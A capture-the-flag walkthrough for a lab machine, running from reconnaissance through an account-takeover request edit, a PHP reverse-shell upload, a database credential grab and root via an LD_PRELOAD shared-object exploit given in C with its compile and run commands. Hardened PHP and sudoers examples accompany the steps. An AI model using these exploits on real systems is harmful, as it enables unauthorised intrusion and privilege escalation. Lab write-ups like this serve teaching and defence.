Road

Reconnaissance

We don't know anything about the machine yet, and the CTF description doesn't reveal anything either, so let's start with an aggressive Nmap scan.

Nmap output
Starting Nmap 7.92 ( https://nmap.org ) at 2021-12-23 00:59 CET
Warning: 10.10.101.170 giving up on port because retransmission cap hit (2).
Nmap scan report for 10.10.101.170
Host is up (0.039s latency).
Not shown: 65533 closed tcp ports (reset)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   3072 e6:dc:88:69:de:a1:73:8e:84:5b:a1:3e:27:9f:07:24 (RSA)
|   256 6b:ea:18:5d:8d:c7:9e:9a:01:2c:dd:50:c5:f8:c8:05 (ECDSA)
|_  256 ef:06:d7:e4:b1:65:15:6e:94:62:cc:dd:f0:8a:1a:24 (ED25519)
80/tcp open  http    Apache httpd 2.4.41 ((Ubuntu))
|_http-title: Sky Couriers
|_http-server-header: Apache/2.4.41 (Ubuntu)
Aggressive OS guesses: Linux 3.1 (95%), Linux 3.2 (95%), AXIS 210A or 211 Network Camera (Linux 2.6.17) (94%), ASUS RT-N56U WAP (Linux 3.4) (93%), Linux 3.16 (93%), Adtran 424RG FTTH gateway (92%), Linux 2.6.32 (92%), Linux 2.6.39 - 3.2 (92%), Linux 3.1 - 3.2 (92%), Linux 3.11 (92%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE (using port 554/tcp)
HOP RTT      ADDRESS
1   39.14 ms 10.8.0.1
2   39.27 ms 10.10.101.170

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 53.45 seconds

Well, that really doesn't reveal much; pretty standard stuff.

Navigating a bit through the website, I can't really find anything suspicious yet either, so let's run a gobuster scan and see if we can find something.

gobuster dir -w directories.txt -u http://10.10.101.170/v2/admin
===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://10.10.101.170/v2/admin
[+] Method:                  GET
[+] Threads:                 30
[+] Wordlist:                directory-list-2.3-medium.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.1.0
[+] Timeout:                 10s
===============================================================
2021/12/23 01:05:40 Starting gobuster in directory enumeration mode
===============================================================
Progress: 136645 / 220561 (61.95%)^C
[!] Keyboard interrupt detected, terminating.

===============================================================
2021/12/23 01:08:50 Finished
===============================================================

Again, nothing special.

After reading some more of the source code, I couldn't locate anything, so let's move on to actually using the website.

Scanning

After running gobuster again with a bigger wordlist, it finally found a register.html endpoint in /v2/admin. So let's register and see what we can do once logged in.

We are greeted with a nicely designed dashboard, and going into my profile we are able to change some parameters of our account, but not the image, as that looks like it's reserved for the admin only. In the meantime, it looks like they also leaked his email, so we will save that for later.

Digging a bit more, we see there's a reset user functionality that lets you change the password, while the username is greyed out. We all know greying out a field in a form isn't enough to block malicious input though, as hackers can easily modify the request through Burp Suite, so let's fire it up.

Exploiting

Now we know the admin email, so let's try changing ours to that by modifying the request with Burp Suite Repeater.

And it looks like we are successful, so let's try to log in, now as admin.
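The server trusted the username field from the request body, which is why greying it out in the browser changed nothing. As an added example, and not the Sky Couriers code, here is a vulnerable reset handler next to one that takes the target account from the server-side session; the PDO handle `$pdo`, the `users` table and its columns are assumptions.

```php
<?php
// Added example (not the Sky Couriers code): why a greyed-out field is not a control.
// Assumes a PDO handle $pdo and a hypothetical users table (username, password_hash);
// the session stores the logged-in account as $_SESSION['username'].
session_start();

// VULNERABLE: the account to update comes from the POST body. The browser disables
// the field, but a proxied request can carry any value, such as the admin's email
// leaked on the profile page, and the password of that account gets overwritten.
function reset_password_vulnerable(PDO $pdo, array $post): bool {
    $hash = password_hash($post['password'] ?? '', PASSWORD_DEFAULT);
    $stmt = $pdo->prepare('UPDATE users SET password_hash = ? WHERE username = ?');
    return $stmt->execute([$hash, $post['username'] ?? '']);   // attacker-controlled target
}

// HARDENED: the target account is taken from the server-side session, never from the
// request; the current password is re-verified and the session id is rotated afterwards.
function reset_password_hardened(PDO $pdo, array $post): bool {
    if (!isset($_SESSION['username'])) {
        return false;                                           // not logged in
    }
    $user = $_SESSION['username'];
    $stmt = $pdo->prepare('SELECT password_hash FROM users WHERE username = ?');
    $stmt->execute([$user]);
    $row = $stmt->fetch(PDO::FETCH_ASSOC);
    if ($row === false || !password_verify($post['current_password'] ?? '', $row['password_hash'])) {
        return false;                                           // wrong current password
    }
    $hash = password_hash($post['new_password'] ?? '', PASSWORD_DEFAULT);
    $stmt = $pdo->prepare('UPDATE users SET password_hash = ? WHERE username = ?');
    $ok = $stmt->execute([$hash, $user]);
    if ($ok) {
        session_regenerate_id(true);                            // invalidate the old session id
    }
    return $ok;
}
```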

It worked. Now let's abuse this image upload tool to hopefully upload a PHP reverse shell (as we already know PHP is what the backend uses) and get access to the server.

I always get my PHP reverse shell from here, but you can use any.

Well, it looks like it worked, as there is no negative feedback from the page.

Reading the source code, it exposes an important endpoint for this through a comment, "/v2/profileimages/", so we can only guess we have to start a listener and navigate to "/v2/profileimages/ReverseShellName.php" to invoke the shell.
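The upload accepted a .php file under its original name and dropped it into a directory Apache serves and executes, which is the whole bug. As an added example, not the site's code, here is a PHP upload handler that sniffs the real content type, chooses the file name and extension itself and stores the file outside the web root; the field name `image` and the storage path are assumptions.

```php
<?php
// Added example (not the Sky Couriers code): hardening the profile-image upload.
// Assumes the form field is named 'image' and a hypothetical storage directory
// outside the DocumentRoot, served back through a PHP handler rather than directly.
const UPLOAD_DIR = '/var/www/uploads_private';          // hypothetical: not web-accessible
const MAX_BYTES  = 2 * 1024 * 1024;
const ALLOWED    = ['image/png' => 'png', 'image/jpeg' => 'jpg', 'image/gif' => 'gif'];

// Returns the stored file name on success, or null when the upload is rejected.
function store_profile_image(array $file): ?string {
    if (($file['error'] ?? UPLOAD_ERR_NO_FILE) !== UPLOAD_ERR_OK || $file['size'] > MAX_BYTES) {
        return null;
    }
    // Never trust $file['name'] or $file['type']: both are supplied by the client.
    // Sniff the content type from the bytes that actually arrived.
    $finfo = new finfo(FILEINFO_MIME_TYPE);
    $mime  = $finfo->file($file['tmp_name']);
    if (!is_string($mime) || !array_key_exists($mime, ALLOWED)) {
        return null;                                     // e.g. text/x-php is rejected here
    }
    // Second check: the file must decode as an image at all.
    if (getimagesize($file['tmp_name']) === false) {
        return null;
    }
    // Server-chosen random name and extension, so a ".php" suffix can never be smuggled in.
    $name = bin2hex(random_bytes(16)) . '.' . ALLOWED[$mime];
    $dest = UPLOAD_DIR . '/' . $name;
    if (!move_uploaded_file($file['tmp_name'], $dest)) {
        return null;
    }
    chmod($dest, 0644);                                  // readable, never executable
    return $name;
}

// Usage from the upload endpoint:
// $stored = store_profile_image($_FILES['image'] ?? []);
// if ($stored === null) { http_response_code(400); }
```

If the images must stay under /v2/profileimages/, also disable PHP execution for that directory (for example `php_admin_flag engine off` in the Apache vhost) so that a polyglot file passing both checks is still inert when fetched.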

Gaining foothold
Connection from 10.10.101.170:41246
Linux sky 5.4.0-73-generic #82-Ubuntu SMP Wed Apr 14 17:39:42 UTC 2021 x86_64 x86_64 x86_64 GNU/Linux
 00:40:10 up 44 min,  0 users,  load average: 0.62, 0.22, 0.10
USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off
$ python3 -c "import pty;pty.spawn('/bin/bash')"
www-data@sky:/$ export TERM=xterm; export SHELL=/bin/bash
export TERM=xterm; export SHELL=/bin/bash
www-data@sky:/$ ^Zfish: Job 1, 'nc -lvp 1337' has stopped
max@1337 ~> stty raw -echo;fg
Send job 1, “nc -lvp 1337” to foreground


www-data@sky:/$

Finally we are in. You can go and grab the user flag at /home/webdeveloper/, but we need to do some lateral movement and get a real user instead of www-data, so let's move on to privilege escalation.

Privilege Escalation

Looking at /etc/shadow, we can see there's a mongodb user, so let's see if we have access to the database.

Execute mongo in the terminal
> show dbs
shshow dbs
admin   0.000GB
backup  0.000GB
config  0.000GB
local   0.000GB
> use backup
ususe backup
switched to db backup
> show collections
shshow collections
collection
user
> db.user.find();
dbdb.user.find();
{ "_id" : ObjectId("60ae2661203d21857b184a76"), "Month" : "Feb", "Profit" : "25000" }
{ "_id" : ObjectId("60ae2677203d21857b184a77"), "Month" : "March", "Profit" : "5000" }
{ "_id" : ObjectId("60ae2690203d21857b184a78"), "Name" : "webdeveloper", "Pass" : "BahamasChapp123!@#" }
{ "_id" : ObjectId("60ae26bf203d21857b184a79"), "Name" : "Rohit", "EndDate" : "December" }
{ "_id" : ObjectId("60ae26d2203d21857b184a7a"), "Name" : "Rohit", "Salary" : "30000" }
> exit
exexit
bye
Error saving history file: FileOpenFailed Unable to open() file /var/www/.dbshell: Permission denied
www-data@sky:/var/www/html$ su webdeveloper
su webdeveloper
Password: BahamasChapp123!@#

webdeveloper@sky:/var/www/html$ 

Lateral movement was successful; now let's see if we can get root this time.

Looking at the sudo -l output, I notice something suspicious besides the binary we can execute with sudo: the LD_PRELOAD environment variable is preserved through env_keep.

Looking at this article, it looks like it could be vulnerable, so let's try their C code example.

exploit.c
#include <stdio.h>
#include <sys/types.h>
#include <stdlib.h>
#include <unistd.h>   /* declares setuid()/setgid(); without it gcc warns about implicit declarations */

/* Built with -nostartfiles, so _init becomes the library's initialiser and runs as
 * soon as the dynamic loader preloads exploit.so into the sudo-launched process. */
void _init() {
    unsetenv("LD_PRELOAD");   /* stop the library from loading again in the spawned shell */
    setgid(0);
    setuid(0);                /* the process is already root under sudo; make it the real uid too */
    system("/bin/sh");
}
Compiling and executing
gcc -fPIC -shared -o exploit.so exploit.c -nostartfiles
exploit.c: In function ‘_init’:
exploit.c:6:1: warning: implicit declaration of function ‘setgid’ [-Wimplicit-function-declaration]
    6 | setgid(0);
      | ^~~~~~
exploit.c:7:1: warning: implicit declaration of function ‘setuid’ [-Wimplicit-function-declaration]
    7 | setuid(0);
      | ^~~~~~
webdeveloper@sky:/tmp$ sudo -l
sudo -l
Matching Defaults entries for webdeveloper on sky:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin,
    env_keep+=LD_PRELOAD

User webdeveloper may run the following commands on sky:
    (ALL : ALL) NOPASSWD: /usr/bin/sky_backup_utility
webdeveloper@sky:/tmp$ sudo LD_PRELOAD=/tmp/exploit.so /usr/bin/sky_backup_utility
sudo LD_PRELOAD=/tmp/exploit.so /usr/bin/sky_backup_utility
# id
id
uid=0(root) gid=0(root) groups=0(root)
# 
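The root cause here is the single sudoers line that re-adds LD_PRELOAD to the environment that sudo otherwise scrubs. As an added example, and not the room's own configuration file, the weak Defaults as they appear in the sudo -l output above sit next to the corrected version; the rule for sky_backup_utility is taken from the page, the file layout follows Ubuntu's stock sudoers.

```text
# WEAK (matches the sudo -l output on the box): env_reset strips the caller's
# environment, but env_keep+=LD_PRELOAD puts back the one variable that lets an
# unprivileged user load arbitrary code into a root process.
Defaults        env_reset
Defaults        mail_badpass
Defaults        secure_path="/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/bin"
Defaults        env_keep+=LD_PRELOAD
webdeveloper    ALL=(ALL:ALL) NOPASSWD: /usr/bin/sky_backup_utility

# HARDENED: drop the env_keep line. sudo's default env_reset already removes
# LD_PRELOAD, LD_LIBRARY_PATH and the other LD_* variables, so the dynamic loader
# never sees a user-controlled library when the backup utility runs as root.
Defaults        env_reset
Defaults        mail_badpass
Defaults        secure_path="/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/bin"
webdeveloper    ALL=(ALL:ALL) NOPASSWD: /usr/bin/sky_backup_utility
```

Edit the file only through visudo so the syntax is validated, then confirm with `sudo -l` as webdeveloper that the env_keep+=LD_PRELOAD entry no longer appears in the Defaults.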

And that's it, now just go and grab the root flag. Hope you enjoyed it!